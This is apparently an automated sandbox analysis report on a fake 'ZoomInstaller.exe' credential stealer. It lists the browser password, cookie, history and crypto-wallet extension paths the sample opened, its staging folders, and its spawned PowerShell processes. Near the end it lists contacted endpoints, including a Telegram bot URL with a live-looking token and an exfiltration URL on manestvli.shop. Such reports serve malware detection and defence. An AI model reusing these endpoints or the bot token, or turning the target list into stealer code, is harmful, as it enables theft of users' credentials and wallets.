Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\UMMBDNEQBN VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\WUTJSCBCFX VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\FENIVHOIKN VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Downloads VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Detected generic credential text file
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ocglkepbibnalbgmbachknglpdipeoio Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Neon\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\ZoomInstaller.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: ZoomInstaller.exe PID: 7284, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544493 Sample: ZoomInstaller.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 76 43 api.telegram.org 2->43 45 manestvli.shop 2->45 47 api.myip.com 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Machine Learning detection for sample 2->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->59 61 AI detected suspicious sample 2->61 8 ZoomInstaller.exe 25 2->8         started        signatures3 63 Uses the Telegram API (likely for C&C communication) 43->63 process4 dnsIp5 49 api.telegram.org 149.154.167.220, 443, 49738 TELEGRAMRU United Kingdom 8->49 51 manestvli.shop 188.114.97.3, 443, 49737 CLOUDFLARENETUS European Union 8->51 53 api.myip.com 104.26.9.59, 443, 49730 CLOUDFLARENETUS United States 8->53 35 C:\Users\user\AppData\Local\...\history.db, SQLite 8->35 dropped 37 C:\Users\user\AppData\Local\...\webdata.db, SQLite 8->37 dropped 39 C:\Users\user\AppData\Local\...\passwords.db, SQLite 8->39 dropped 41 5 other malicious files 8->41 dropped 65 Installs new ROOT certificates 8->65 67 Tries to harvest and steal browser information (history, passwords, etc) 8->67 69 Detected generic credential text file 8->69 13 powershell.exe 15 8->13         started        15 powershell.exe 15 8->15         started        17 powershell.exe 11 8->17         started        19 6 other processes 8->19 file6 signatures7 process8 process9 21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        29 conhost.exe 19->29         started        31 conhost.exe 19->31         started        33 3 other processes 19->33
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
104.26.9.59
 api.myip.com United States
13335 CLOUDFLARENETUS false
188.114.97.3
 manestvli.shop European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
api.myip.com 104.26.9.59 true
manestvli.shop 188.114.97.3 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.myip.com/ false
    		unknown
    https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage false
      		unknown
      https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344f true
        		unknown